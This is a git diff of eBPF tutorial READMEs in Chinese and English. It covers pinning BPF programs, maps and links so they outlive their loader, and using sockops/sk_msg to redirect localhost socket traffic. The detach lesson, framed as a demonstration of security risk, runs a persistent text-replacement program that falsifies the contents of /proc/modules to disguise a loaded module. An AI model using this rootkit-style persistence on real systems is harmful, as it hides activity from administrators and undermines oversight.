程序的字符串替换示例来展示 detach 方法。可以使用类似的代码将程序、映射和链接固定到 BPF 对象中: + +```c +int pin_program(struct bpf_program *prog, const char* path) +{ + int err; + err = bpf_program__pin(prog, path); + if (err) { + fprintf(stdout, "could not pin prog %s: %d\n", path, err); + return err; + } + return err; +} + +int pin_map(struct bpf_map *map, const char* path) +{ + int err; + err = bpf_map__pin(map, path); + if (err) { + fprintf(stdout, "could not pin map %s: %d\n", path, err); + return err; + } + return err; +} + +int pin_link(struct bpf_link *link, const char* path) +{ + int err; + err = bpf_link__pin(link, path); + if (err) { + fprintf(stdout, "could not pin link %s: %d\n", path, err); + return err; + } + return err; +} +``` + +## 运行示例 + +在这个示例中,我们将继续使用前一节中的字符串替换示例来演示在应用程序退出后运行 eBPF 程序的方法,并展示潜在的安全风险。通过使用 `--detach` 参数运行该程序,可以使用户空间加载程序在不停止 eBPF 程序的情况下退出。完整的示例代码可以在 中找到。关于如何安装依赖,请参考: + +在运行之前,请确保已经挂载了 BPF 文件系统: + +```bash +sudo mount bpffs -t bpf /sys/fs/bpf +mkdir /sys/fs/bpf/textreplace +``` + +然后,可以使用以下命令运行带有 detach 参数的 text-replace2 程序: + +```bash +./textreplace2 -f /proc/modules -i 'joydev' -r 'cryptd' -d +``` + +这将在 `/sys/fs/bpf/textreplace` 目录下创建一些 eBPF 链接文件。加载程序成功运行后,可以使用以下命令检查日志: + +```bash +sudo cat /sys/kernel/debug/tracing/trace_pipe +# 确认链接文件是否存在 +sudo ls -l /sys/fs/bpf/textreplace +``` + +最后,要停止程序,只需删除链接文件: + +```bash +sudo rm -r /sys/fs/bpf/textreplace +``` + +## 参考资料 + +您可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +- [bad-bpf](https://github.com/pathtofile/bad-bpf) +- [Object Lifetime in the Linux kernel](https://facebookmicrosites.github.io/bpf/blog/2018/08/31/object-lifetime.html) +- [BPFMan: A Novel Way to Manage eBPF—Beyond Capsule Mode](https://bpfman.io/main/blog/2023/09/07/bpfman-a-novel-way-to-manage-ebpf) + +> 原文地址: diff --git a/src/28-detach/README_en.md b/src/28-detach/README_en.md deleted file mode 100644 index 645f798..0000000 --- a/src/28-detach/README_en.md +++ /dev/null @@ -1,130 +0,0 @@ -# Running eBPF After Application Exits: The Lifecycle of eBPF Programs - -eBPF (Extended Berkeley Packet Filter) is a revolutionary technology in the Linux kernel that allows users to execute custom programs in kernel space without modifying the kernel source code or loading any kernel modules. This provides developers with great flexibility to observe, modify, and control the Linux system. - -This article introduces the Lifecycle of eBPF Programs, how to run eBPF programs after user-space application exits, and how to use pin to share eBPF objects between processes. This article is part of the eBPF Developer Tutorial, more details can be found in and - -By using the detach method to run eBPF programs, the user space loader can exit without stopping the eBPF program. Another common use case for pinning is sharing eBPF objects between processes. For example, one could create a Map from Go, pin it, and inspect it using `bpftool map dump pinned /sys/fs/bpf/my_map`. - -## The Lifecycle of eBPF Programs - -File descriptors and reference counters are used to manage BPF objects (progs, maps, and debug info). When a map is created, the kernel initializes its reference counter to 1 and returns a file descriptor to the user space process. If the process exits or crashes, the file descriptor is closed and the reference counter of the map is decremented. After the RCU grace period, the map is freed from memory. - -BPF programs that use BPF maps are loaded in two phases. The maps are created and their file descriptors are stored in the program's 'imm' field. The kernel increments the reference counters of the maps used by the program and initializes the program's reference counter to 1. Even if the user space process closes the file descriptors associated with the maps, the maps will not disappear because the program is still "using" them. When the file descriptor of the program is closed and its reference counter reaches zero, the destruction logic decrements the reference counters of all maps used by the program. This allows the same map to be used by multiple programs at once. - -When a program is attached to a hook, its reference counter is incremented. The user space process that created the maps and program can then exit, and the maps and program will remain alive as long as their reference counters are greater than zero. This is the lifecycle of a BPF object. - -Not all attachment points are the same. XDP, tc's clsact, and cgroup-based hooks are global, meaning that programs will stay attached to them as long as the corresponding objects are alive. On the other hand, programs attached to kprobe, uprobe, tracepoint, perf_event, raw_tracepoint, socket filters, and so_reuseport hooks are local to the process. If the process crashes or closes the file descriptors associated with these hooks, the kernel will detach the BPF program and decrement its reference counter. - -The file descriptor based interface provides auto-cleanup, meaning that if anything goes wrong with the user space process, the kernel will automatically clean up all BPF objects. This interface is useful for networking as well. The use of BPFFS (BPF File System) allows a process to pin a BPF program or map, which increments their reference counters and keeps them alive even if they are not attached or used by any program. This is useful when an admin wants to examine a map even when the associated program is not running. - -Detach and replace are important aspects of the lifetime of a BPF program. The detach hook prevents the execution of a previously attached program from any future events, while the replace feature allows a program to be replaced in cgroup-based hooks. There is a window where the old and new programs can be executing on different CPUs, but the kernel guarantees that one of them will be processing events. Some BPF developers use a scheme where the new program is loaded with the same maps as the old program to ensure safe replacement. - -Overall, understanding the lifetime of BPF programs and maps is crucial for users to use BPF safely and without surprises. The use of file descriptors, reference counters, and BPFFS helps manage the lifecycle of BPF objects, ensuring their proper creation, attachment, detachment, and replacement. - -### eBPF in Kubernetes: Deploy eBPF Programs via Remote Procedure Call - -In a Kubernetes environment, deploying eBPF programs often necessitates a higher level of system privileges. Typically, these applications require at least CAP_BPF permissions, and depending on the program type, they may need even more. This requirement poses a challenge in a multi-tenant Kubernetes environment where granting extensive privileges can be a security risk. - -#### Using Pin to Mitigate Privilege Requirements - -One way to address the privilege issue is through the use of pinning eBPF maps. Pinning allows eBPF objects to persist beyond the life of the process that created them, making them accessible to other processes. This method can be particularly useful in Kubernetes, where different containers might need to interact with the same eBPF objects. - -For example, an eBPF map can be created and pinned by a privileged initializer container. Subsequent containers, which may run with fewer privileges, can then interact with the pinned eBPF objects. This approach limits the need for elevated privileges to the initialization phase, thereby enhancing overall security. - -#### The Role of bpfman in eBPF Lifecycle Management - -The bpfman project can play a crucial role in this context. bpfman, or BPF Daemon, is designed to manage the lifecycle of eBPF programs and maps in a more controlled and secure manner. It acts as a mediator between user space and kernel space, providing a mechanism to load and manage eBPF programs without granting extensive privileges to each individual container or application. - -In Kubernetes, bpfman could be deployed as a privileged service, responsible for loading and managing eBPF programs across different nodes in the cluster. It can handle the intricacies of eBPF lifecycle management, such as loading, unloading, updating eBPF programs, and managing their state. This centralized approach simplifies the deployment and management of eBPF programs in a Kubernetes cluster, while adhering to security best practices. - -## Use Detach to Replace by Any Program with eBPF After it Exits - -In libbpf, the `bpf_object__pin_maps` function can be used to pin the maps in the BPF object, the programs and links has similar API. - -Here we use similar programs as textreplace in the previous section to demonstrate the detach method, the pin eBPF code is like: - -```c - -int pin_program(struct bpf_program *prog, const char* path) -{ - int err; - err = bpf_program__pin(prog, path); - if (err) { - fprintf(stdout, "could not pin prog %s: %d\n", path, err); - return err; - } - return err; -} - -int pin_map(struct bpf_map *map, const char* path) -{ - int err; - err = bpf_map__pin(map, path); - if (err) { - fprintf(stdout, "could not pin map %s: %d\n", path, err); - return err; - } - return err; -} - -int pin_link(struct bpf_link *link, const char* path) -{ - int err; - err = bpf_link__pin(link, path); - if (err) { - fprintf(stdout, "could not pin link %s: %d\n", path, err); - return err; - } - return err; -} -``` - -## Running - -Here, we still use the example of string replacement used in the previous application to demonstrate potential security risks. By using `--detach` to run the program, the user space loader can exit without stopping the eBPF program. - -The code of This example can be found in - -Compilation: - -```bash -make -``` - -Before running, please make sure that the BPF file system has been mounted: - -```bash -sudo mount bpffs -t bpf /sys/fs/bpf -mkdir /sys/fs/bpf/textreplace -``` - -Then, you can run text-replace2 with detach: - -```bash -./textreplace2 -f /proc/modules -i 'joydev' -r 'cryptd' -d -``` - -This will create some eBPF link files under `/sys/fs/bpf/textreplace`. Once the loader is successfully running, you can check the log by running the following command: - -```bash -sudo cat /sys/kernel/debug/tracing/trace_pipe -# Confirm that the link files exist -sudo ls -l /sys/fs/bpf/textreplace -``` - -Finally, to stop, simply delete the link files: - -```bash -sudo rm -r /sys/fs/bpf/textreplace -``` - -## References - -You can visit our tutorial code repository [at https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [at https://eunomia.dev/zh/tutorials/](https://eunomia.dev/zh/tutorials/) for more examples and a complete tutorial. - -- -- -- - -> The original link of this article: diff --git a/src/29-sockops/README.md b/src/29-sockops/README.md index c320e85..8548b9f 100644 --- a/src/29-sockops/README.md +++ b/src/29-sockops/README.md @@ -1,26 +1,26 @@ -# eBPF 开发实践:使用 sockops 加速网络请求转发 +# eBPF Development Practices: Accelerating Network Request Forwarding with Sockops -eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一个强大功能,可以在无需更改内核源代码或重启内核的情况下,运行、加载和更新用户定义的代码。这种功能让 eBPF 在网络和系统性能分析、数据包过滤、安全策略等方面有了广泛的应用。 +eBPF (Extended Berkeley Packet Filter) is a powerful feature in the Linux kernel that allows running, loading, and updating user-defined code without the need to modify the kernel source code or reboot the kernel. This capability makes eBPF widely used in various areas such as network and system performance analysis, packet filtering, security policies, etc. -本教程将关注 eBPF 在网络领域的应用,特别是如何使用 sockops 类型的 eBPF 程序来加速本地网络请求的转发。这种应用通常在使用软件负载均衡器进行请求转发的场景中很有价值,比如使用 Nginx 或 HAProxy 之类的工具。 +This tutorial will focus on the application of eBPF in the networking domain, specifically how to use sockops-type eBPF programs to accelerate the forwarding of local network requests. This application is often valuable in scenarios where software load balancers are used for request forwarding, such as using tools like Nginx or HAProxy. -在许多工作负载中,如微服务架构下的服务间通信,通过本机进行的网络请求的性能开销可能会对整个应用的性能产生显著影响。由于这些请求必须经过本机的网络栈,其处理性能可能会成为瓶颈,尤其是在高并发的场景下。为了解决这个问题,sockops 类型的 eBPF 程序可以用于加速本地的请求转发。sockops 程序可以在内核空间管理套接字,实现在本机上的套接字之间直接转发数据包,从而降低了在 TCP/IP 栈中进行数据包转发所需的 CPU 时间。 +In many workloads, such as inter-service communication in a microservices architecture, the performance overhead of network requests made through the loopback interface can significantly impact the overall application performance. Since these requests have to go through the local network stack, their processing performance can become a bottleneck, especially in high-concurrency scenarios. To address this issue, sockops-type eBPF programs can be used to accelerate local request forwarding, providing functionality similar to direct memory access (DMA). Sockops programs can manage sockets in the kernel space and directly forward packets between sockets on the local machine, reducing the CPU time required for packet forwarding in the TCP/IP stack. -本教程将会通过一个具体的示例演示如何使用 sockops 类型的 eBPF 程序来加速网络请求的转发。为了让你更好地理解如何使用 sockops 程序,我们将逐步介绍示例程序的代码,并讨论每个部分的工作原理。完整的源代码和工程可以在 中找到。 +This tutorial will demonstrate how to use sockops-type eBPF programs to accelerate network request forwarding through a specific example. To help you understand how to use sockops programs, we will step by step introduce the code of the example program and discuss the working principle of each part. The complete source code and project can be found at . -## 利用 eBPF 的 sockops 进行性能优化 +## Leveraging eBPF Sockops for Performance Optimization -网络连接本质上是 socket 之间的通讯,eBPF 提供了一个 [bpf_msg_redirect_hash](https://man7.org/linux/man-pages/man7/bpf-helpers.7.html) 函数,用来将应用发出的包直接转发到对端的 socket,可以极大地加速包在内核中的处理流程。 +Network connections are essentially communication between sockets, and eBPF provides a `bpf_msg_redirect_hash` function that allows packets sent by an application to be directly forwarded to the corresponding socket on the recipient side, greatly accelerating the packet processing flow in the kernel. -这里 sock_map 是记录 socket 规则的关键部分,即根据当前的数据包信息,从 sock_map 中挑选一个存在的 socket 连接来转发请求。所以需要先在 sockops 的 hook 处或者其它地方,将 socket 信息保存到 sock_map,并提供一个规则 (一般为四元组) 根据 key 查找到 socket。 +Here, the `sock_map` is a key component that stores socket rules, i.e., it selects an existing socket connection from the `sock_map` based on the current packet information. Therefore, it is necessary to save the socket information to the `sock_map` at the hook of the sockops or elsewhere and provide a rule (usually a four-tuple) to find the socket based on the key. -Merbridge 项目就是这样实现了用 eBPF 代替 iptables 为 Istio 进行加速。在使用 Merbridge (eBPF) 优化之后,出入口流量会直接跳过很多内核模块,明显提高性能,如下图所示: +The Merbridge project has achieved acceleration for Istio by replacing iptables with eBPF. After using Merbridge (eBPF) optimization, the inbound and outbound traffic bypasses many kernel modules, significantly improving performance, as shown in the following diagram: ![merbridge](merbridge.png) -## 示例程序 +## Example Program -此示例程序从发送者的套接字(出口)重定向流量至接收者的套接字(入口),**跳过 TCP/IP 内核网络栈**。在这个示例中,我们假定发送者和接收者都在**同一台**机器上运行。这个示例程序有两个部分,它们共享一个 map 定义: +This example program redirects traffic from the sender’s socket (outgoing) to the recipient’s socket (incoming), bypassing the TCP/IP kernel network stack. In this example, we assume that the sender and recipient are both running on the **same** machine. This example program has two parts that share a map definition: bpf_sockmap.h @@ -47,19 +47,19 @@ struct { } sock_ops_map SEC(".maps"); ``` -这个示例程序中的 BPF 程序被分为两个部分 `bpf_redirect.bpf.c` 和 `bpf_contrack.bpf.c`。 +The BPF program in this example is divided into two parts: `bpf_redirect.bpf.c` and `bpf_contrack.bpf.c`. -- `bpf_contrack.bpf.c` 中的 BPF 代码定义了一个套接字操作(`sockops`)程序,它的功能主要是当本机(使用 localhost)上的任意 TCP 连接被创建时,根据这个新连接的五元组(源地址,目标地址,源端口,目标端口,协议),在 `sock_ops_map` 这个 BPF MAP 中创建一个条目。这个 BPF MAP 被定义为 `BPF_MAP_TYPE_SOCKHASH` 类型,可以存储套接字和对应的五元组。这样使得每当本地 TCP 连接被创建的时候,这个连接的五元组信息也能够在 BPF MAP 中找到。 +- The BPF code in `bpf_contrack.bpf.c` defines a socket operation (`sockops`) program, whose main function is to create an entry in the `sock_ops_map` BPF map in which it stores the five-tuple (source address, destination address, source port, destination port, protocol) for each new TCP connection established on the local machine (using localhost). This BPF map is defined as type `BPF_MAP_TYPE_SOCKHASH` and can store sockets and their corresponding five-tuple. This allows the five-tuple information of each local TCP connection to be found in the BPF map whenever the connection is created. -- `bpf_redirect.bpf.c` 中的 BPF 代码定义了一个网络消息 (sk_msg) 处理程序,当本地套接字上有消息到达时会调用这个程序。然后这个 sk_msg 程序检查该消息是否来自本地地址,如果是,根据获取的五元组信息(源地址,目标地址,源端口,目标端口,协议)在 `sock_ops_map` 查找相应的套接字,并将该消息重定向到在 `sock_ops_map` 中找到的套接字上,这样就实现了绕过内核网络栈。 +- The BPF code in `bpf_redirect.bpf.c` defines a sk_msg handler that is called when a message arrives on a local socket. The sk_msg program checks if the message is from a local address, and if so, it retrieves the five-tuple (source address, destination address, source port, destination port, protocol) from the message and looks up the corresponding socket in the `sock_ops_map` using the obtained key. Then, it redirects the message to the socket found in the `sock_ops_map`, thus bypassing the kernel network stack and directly delivering the message from the sender's socket to the receiver's socket. -举个例子,我们假设有两个进程在本地运行,进程 A 绑定在 8000 端口上,进程 B 绑定在 9000 端口上,进程 A 向进程 B 发送消息。 +For example, let's assume that there are two processes running locally, process A binds to port 8000, and process B binds to port 9000. Process A sends a message to process B. -1. 当进程 A 首次和进程 B 建立 TCP 连接时,触发 `bpf_contrack.bpf.c` 中的 `sockops` 程序,这个程序将五元组 `{127.0.0.1, 127.0.0.1, 8000, 9000, TCP}` 存入 `sock_ops_map`,值为进程 A 的套接字。 +1. When the TCP connection is first established between process A and process B, the `sockops` program in `bpf_contrack.bpf.c` is triggered, and it creates an entry in the `sock_ops_map` BPF map for the five-tuple `{127.0.0.1, 127.0.0.1, 8000, 9000, TCP}`, with the value being the socket of process A. -2. 当进程 A 发送消息时,触发 `bpf_redirect.bpf.c` 中的 `sk_msg` 程序,然后 `sk_msg` 程序将消息从进程 A 的套接字重定向到 `sock_ops_map` 中存储的套接字(进程 A 的套接字)上,因此,消息被直接从进程 A 输送到进程 B,绕过了内核网络栈。 +2. When process A sends a message, the `sk_msg` program in `bpf_redirect.bpf.c` is triggered, and it redirects the message from process A's socket to the socket stored in the `sock_ops_map` based on the obtained five-tuple information (source address, destination address, source port, destination port, protocol). As a result, the message is directly delivered from process A to process B, bypassing the kernel network stack. -这个示例程序就是通过 BPF 实现了在本地通信时,快速将消息从发送者的套接字重定向到接收者的套接字,从而绕过了内核网络栈,以提高传输效率。 +This example program uses BPF to efficiently redirect messages from the sender's socket to the recipient's socket during local communication, bypassing the kernel network stack to improve transmission efficiency. bpf_redirect.bpf.c @@ -96,9 +96,9 @@ SEC("sockops") int bpf_sockops_handler(struct bpf_sock_ops *skops){ u32 family, op; - family = skops->family; - op = skops->op; - if (op != BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB + family = skops->family; + op = skops->op; + if (op != BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB && op != BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB) { return BPF_OK; } @@ -107,7 +107,7 @@ int bpf_sockops_handler(struct bpf_sock_ops *skops){ return BPF_OK; } - struct sock_key key = { + struct sock_key key = { .dip = skops->remote_ip4, .sip = skops->local_ip4, .sport = bpf_htonl(skops->local_port), /* convert to network byte order */ @@ -115,31 +115,31 @@ int bpf_sockops_handler(struct bpf_sock_ops *skops){ .family = skops->family, }; - bpf_printk(">>> new connection: OP:%d, PORT:%d --> %d\n", op, bpf_ntohl(key.sport), bpf_ntohl(key.dport)); + bpf_printk(">>> new connection: OP:%d, PORT:%d --> %d\n", op, bpf_ntohl(key.sport), bpf_ntohl(key.dport)); - bpf_sock_hash_update(skops, &sock_ops_map, &key, BPF_NOEXIST); + bpf_sock_hash_update(skops, &sock_ops_map, &key, BPF_NOEXIST); return BPF_OK; } ``` -### 编译 eBPF 程序 +### Compiling the eBPF Program -这里我们使用 libbpf 编译这个 eBPF 程序。完整的源代码和工程可以在 中找到。关于如何安装依赖,请参考: +Here, we use libbpf to compile the eBPF program. The complete source code and project can be found at . ```shell # Compile the bpf program with libbpf make ``` -### 加载 eBPF 程序 +### Loading the eBPF Program -我们编写了一个脚本来加载 eBPF 程序,它会自动加载两个 eBPF 程序并创建一个 BPF MAP: +We have created a script to load the eBPF program, which will automatically load both eBPF programs and create a BPF map: ```shell sudo ./load.sh ``` -这个脚本实际上完成了这些操作: +This script actually performs the following operations: ```sh #!/bin/bash @@ -164,24 +164,24 @@ sudo bpftool prog load bpf_redirect.bpf.o "/sys/fs/bpf/bpf_redir" map name sock_ sudo bpftool prog attach pinned /sys/fs/bpf/bpf_redir msg_verdict pinned /sys/fs/bpf/sock_ops_map ``` -这是一个 BPF 的加载脚本。它的主要功能是加载和附加 BPF 程序到内核系统中,并将关联的 BPF map 一并存储(pin)到 BPF 文件系统中,以便 BPF 程序能访问和操作这些 map。 +This is a script for loading BPF programs. Its main function is to load and attach BPF programs to the kernel system, and store the associated BPF maps in the BPF file system so that the BPF programs can access and operate on these maps. -让我们详细地看一下脚本的每一行是做什么的。 +Let's take a detailed look at what each line of the script does. -1. `sudo mount -t bpf bpf /sys/fs/bpf/` 这一行用于挂载 BPF 文件系统,使得 BPF 程序和相关的 map 可以被系统访问和操作。 -2. 判断条件 `[ -e "/sys/fs/bpf/bpf_sockops" ]` 是检查是否已经存在 `/sys/fs/bpf/bpf_sockops` 文件,如果存在,则说明 `bpf_sockops` 程序已经被加载到系统中,那么将会通过 `./unload.sh` 脚本将其卸载。 -3. `sudo bpftool prog load bpf_contrack.bpf.o /sys/fs/bpf/bpf_sockops type sockops pinmaps /sys/fs/bpf/` 这一行是加载上文中 `bpf_contrack.bpf.c` 编译得到的 BPF 对象文件 `bpf_contrack.bpf.o` 到 BPF 文件系统中,存储至 `/sys/fs/bpf/bpf_sockops`,并且指定它的类型为 `sockops`。`pinmaps /sys/fs/bpf/` 是指定将加载的 BPF 程序相关的 map 存储在 `/sys/fs/bpf/` 下。 -4. `sudo bpftool cgroup attach "/sys/fs/cgroup/" sock_ops pinned "/sys/fs/bpf/bpf_sockops"` 这一行是将已经加载到 BPF 文件系统的 `bpf_sockops` 程序附加到 cgroup(此路径为"/sys/fs/cgroup/")。附加后,所有属于这个 cgroup 的套接字操作都会受到 `bpf_sockops` 的影响。 -5. `sudo bpftool prog load bpf_redirect.bpf.o "/sys/fs/bpf/bpf_redir" map name sock_ops_map pinned "/sys/fs/bpf/sock_ops_map"` 这一行是加载 `bpf_redirect.bpf.c` 编译得到的 BPF 对象文件 `bpf_redirect.bpf.o` 到 BPF 文件系统中,存储至 `/sys/fs/bpf/bpf_redir` ,并且指定它的相关 map为 `sock_ops_map`,这个map在 `/sys/fs/bpf/sock_ops_map` 中。 -6. `sudo bpftool prog attach pinned /sys/fs/bpf/bpf_redir msg_verdict pinned /sys/fs/bpf/sock_ops_map` 这一行是将已经加载的 `bpf_redir` 附加到 `sock_ops_map` 上,附加方式为 `msg_verdict`,表示当该 map 对应的套接字收到消息时,将会调用 `bpf_redir` 程序处理。 +1. `sudo mount -t bpf bpf /sys/fs/bpf/` mounts the BPF file system, enabling access to and operation on BPF programs and related maps by the system. +2. The condition check `[ -e "/sys/fs/bpf/bpf_sockops" ]` checks whether the `/sys/fs/bpf/bpf_sockops` file already exists. If it does exist, it means that the `bpf_sockops` program has already been loaded into the system, so it will be uninstalled using the `./unload.sh` script. +3. `sudo bpftool prog load bpf_contrack.bpf.o /sys/fs/bpf/bpf_sockops type sockops pinmaps /sys/fs/bpf/` loads the BPF object file `bpf_contrack.bpf.o` compiled from the `bpf_contrack.bpf.c` into the BPF file system, storing it in `/sys/fs/bpf/bpf_sockops`, and specifying its type as `sockops`. `pinmaps /sys/fs/bpf/` specifies that the BPF maps associated with the loaded BPF program will be stored under `/sys/fs/bpf/`. +4. `sudo bpftool cgroup attach "/sys/fs/cgroup/" sock_ops pinned "/sys/fs/bpf/bpf_sockops"` attaches the `bpf_sockops` program that has been loaded into the BPF file system to the cgroup (the path is `"/sys/fs/cgroup/"`). After the attachment, all socket operations belonging to this cgroup will be affected by the `bpf_sockops` program. +5. `sudo bpftool prog load bpf_redirect.bpf.o "/sys/fs/bpf/bpf_redir" map name sock_ops_map pinned "/sys/fs/bpf/sock_ops_map"` loads the BPF object file `bpf_redirect.bpf.o` compiled from `bpf_redirect.bpf.c` into the BPF file system, storing it in `/sys/fs/bpf/bpf_redir`, and specifying the associated map as `sock_ops_map`, which is located in `/sys/fs/bpf/sock_ops_map`. +6. `sudo bpftool prog attach pinned /sys/fs/bpf/bpf_redir msg_verdict pinned /sys/fs/bpf/sock_ops_map` attaches the already loaded `bpf_redir` program to the `sock_ops_map` using the `msg_verdict` attachment type, which means that when the socket associated with this map receives a message, the `bpf_redir` program will be called to handle it. -综上,此脚本的主要作用就是将两个用于处理本地套接字流量的 BPF 程序分别加载到系统并附加到正确的位置,以便它们能被正确地调用,并且确保它们可以访问和操作相关的 BPF map。 +In summary, the main function of this script is to load the two BPF programs used to process local socket traffic into the system and attach them to the correct locations so that they can be correctly called, ensuring that they can access and manipulate the associated BPF maps. -您可以使用 [bpftool utility](https://github.com/torvalds/linux/blob/master/tools/bpf/bpftool/Documentation/bpftool-prog.rst) 检查这两个 eBPF 程序是否已经加载。 +You can use the [bpftool utility](https://github.com/torvalds/linux/blob/master/tools/bpf/bpftool/Documentation/bpftool-prog.rst) to check if these two eBPF programs have been loaded. ```console $ sudo bpftool prog show -63: sock_ops name bpf_sockops_handler tag 275467be1d69253d gpl +63: sock_ops name bpf_sockmap tag 275467be1d69253d gpl loaded_at 2019-01-24T13:07:17+0200 uid 0 xlated 1232B jited 750B memlock 4096B map_ids 58 64: sk_msg name bpf_redir tag bc78074aa9dd96f4 gpl @@ -189,69 +189,71 @@ $ sudo bpftool prog show xlated 304B jited 233B memlock 4096B map_ids 58 ``` -### 使用 iperf3 或 curl 进行测试 +### Test with iperf3 or curl -运行 [iperf3](https://iperf.fr/) 服务器 +See to install iperf3. + +Running the iperf3 Server: ```shell iperf3 -s -p 5001 ``` -运行 [iperf3](https://iperf.fr/) 客户端 +Running the iperf3 Client: ```shell iperf3 -c 127.0.0.1 -t 10 -l 64k -p 5001 ``` -或者也可以用 Python 和 curl 进行测试: +Or you can use curl and python: ```sh python3 -m http.server curl http://0.0.0.0:8000/ ``` -### 收集追踪 +### Collecting Traces -查看``sock_ops``追踪本地连接建立 +Check the `sock_ops` trace for local connection establishments. ```console -$ ./trace_bpf_output.sh # 实际上就是 sudo cat /sys/kernel/debug/tracing/trace_pipe +$ ./trace_bpf_output.sh # which is basically sudo cat /sys/kernel/debug/tracing/trace_pipe iperf3-9516 [001] .... 22500.634108: 0: <<< ipv4 op = 4, port 18583 --> 4135 iperf3-9516 [001] ..s1 22500.634137: 0: <<< ipv4 op = 5, port 4135 --> 18583 iperf3-9516 [001] .... 22500.634523: 0: <<< ipv4 op = 4, port 19095 --> 4135 iperf3-9516 [001] ..s1 22500.634536: 0: <<< ipv4 op = 5, port 4135 --> 19095 ``` -当iperf3 -c建立连接后,你应该可以看到上述用于套接字建立的事件。如果你没有看到任何事件,那么 eBPF 程序可能没有正确地附加上。 +When the connection is established between `iperf3 -c` and the server, you should see the events above for socket establishment. If you don't see any events, then the eBPF programs may not have been attached correctly. -此外,当``sk_msg``生效后,可以发现当使用 tcpdump 捕捉本地lo设备流量时,只能捕获三次握手和四次挥手流量,而iperf数据流量没有被捕获到。如果捕获到iperf数据流量,那么 eBPF 程序可能没有正确地附加上。 +Furthermore, when `sk_msg` takes effect, you should observe that when capturing local traffic on the loopback interface using tcpdump, only the three-way handshake and four-way termination traffic are captured, and the actual data flow of iperf is not captured. If the iperf data flow is captured, then the eBPF programs may not have been attached correctly. ```console $ ./trace_lo_traffic.sh # tcpdump -i lo port 5001 -# 三次握手 +# Three-way handshake 13:24:07.181804 IP localhost.46506 > localhost.5001: Flags [S], seq 620239881, win 65495, options [mss 65495,sackOK,TS val 1982813394 ecr 0,nop,wscale 7], length 0 13:24:07.181815 IP localhost.5001 > localhost.46506: Flags [S.], seq 1084484879, ack 620239882, win 65483, options [mss 65495,sackOK,TS val 1982813394 ecr 1982813394,nop,wscale 7], length 0 13:24:07.181832 IP localhost.46506 > localhost.5001: Flags [.], ack 1, win 512, options [nop,nop,TS val 1982813394 ecr 1982813394], length 0 -# 四次挥手 +# Four-way termination 13:24:12.475649 IP localhost.46506 > localhost.5001: Flags [F.], seq 1, ack 1, win 512, options [nop,nop,TS val 1982818688 ecr 1982813394], length 0 13:24:12.479621 IP localhost.5001 > localhost.46506: Flags [.], ack 2, win 512, options [nop,nop,TS val 1982818692 ecr 1982818688], length 0 13:24:12.481265 IP localhost.5001 > localhost.46506: Flags [F.], seq 1, ack 2, win 512, options [nop,nop,TS val 1982818694 ecr 1982818688], length 0 13:24:12.481270 IP localhost.46506 > localhost.5001: Flags [.], ack 2, win 512, options [nop,nop,TS val 1982818694 ecr 1982818694], length 0 ``` -### 卸载 eBPF 程序 +### Unloading the eBPF Program ```shell sudo ./unload.sh ``` -## 参考资料 +## References -最后,如果您对 eBPF 技术感兴趣,并希望进一步了解和实践,可以访问我们的教程代码仓库 和教程网站 +Finally, if you are interested in eBPF technology and want to learn more and practice further, you can visit our tutorial code repository at and the tutorial website at . - - -> 原文地址: 转载请注明出处。 +> The original link of this article: diff --git a/src/29-sockops/README.zh.md b/src/29-sockops/README.zh.md new file mode 100644 index 0000000..c320e85 --- /dev/null +++ b/src/29-sockops/README.zh.md @@ -0,0 +1,257 @@ +# eBPF 开发实践:使用 sockops 加速网络请求转发 + +eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一个强大功能,可以在无需更改内核源代码或重启内核的情况下,运行、加载和更新用户定义的代码。这种功能让 eBPF 在网络和系统性能分析、数据包过滤、安全策略等方面有了广泛的应用。 + +本教程将关注 eBPF 在网络领域的应用,特别是如何使用 sockops 类型的 eBPF 程序来加速本地网络请求的转发。这种应用通常在使用软件负载均衡器进行请求转发的场景中很有价值,比如使用 Nginx 或 HAProxy 之类的工具。 + +在许多工作负载中,如微服务架构下的服务间通信,通过本机进行的网络请求的性能开销可能会对整个应用的性能产生显著影响。由于这些请求必须经过本机的网络栈,其处理性能可能会成为瓶颈,尤其是在高并发的场景下。为了解决这个问题,sockops 类型的 eBPF 程序可以用于加速本地的请求转发。sockops 程序可以在内核空间管理套接字,实现在本机上的套接字之间直接转发数据包,从而降低了在 TCP/IP 栈中进行数据包转发所需的 CPU 时间。 + +本教程将会通过一个具体的示例演示如何使用 sockops 类型的 eBPF 程序来加速网络请求的转发。为了让你更好地理解如何使用 sockops 程序,我们将逐步介绍示例程序的代码,并讨论每个部分的工作原理。完整的源代码和工程可以在 中找到。 + +## 利用 eBPF 的 sockops 进行性能优化 + +网络连接本质上是 socket 之间的通讯,eBPF 提供了一个 [bpf_msg_redirect_hash](https://man7.org/linux/man-pages/man7/bpf-helpers.7.html) 函数,用来将应用发出的包直接转发到对端的 socket,可以极大地加速包在内核中的处理流程。 + +这里 sock_map 是记录 socket 规则的关键部分,即根据当前的数据包信息,从 sock_map 中挑选一个存在的 socket 连接来转发请求。所以需要先在 sockops 的 hook 处或者其它地方,将 socket 信息保存到 sock_map,并提供一个规则 (一般为四元组) 根据 key 查找到 socket。 + +Merbridge 项目就是这样实现了用 eBPF 代替 iptables 为 Istio 进行加速。在使用 Merbridge (eBPF) 优化之后,出入口流量会直接跳过很多内核模块,明显提高性能,如下图所示: + +![merbridge](merbridge.png) + +## 示例程序 + +此示例程序从发送者的套接字(出口)重定向流量至接收者的套接字(入口),**跳过 TCP/IP 内核网络栈**。在这个示例中,我们假定发送者和接收者都在**同一台**机器上运行。这个示例程序有两个部分,它们共享一个 map 定义: + +bpf_sockmap.h + +```c +#include "vmlinux.h" +#include +#include + +#define LOCALHOST_IPV4 16777343 + +struct sock_key { + __u32 sip; + __u32 dip; + __u32 sport; + __u32 dport; + __u32 family; +}; + +struct { + __uint(type, BPF_MAP_TYPE_SOCKHASH); + __uint(max_entries, 65535); + __type(key, struct sock_key); + __type(value, int); +} sock_ops_map SEC(".maps"); +``` + +这个示例程序中的 BPF 程序被分为两个部分 `bpf_redirect.bpf.c` 和 `bpf_contrack.bpf.c`。 + +- `bpf_contrack.bpf.c` 中的 BPF 代码定义了一个套接字操作(`sockops`)程序,它的功能主要是当本机(使用 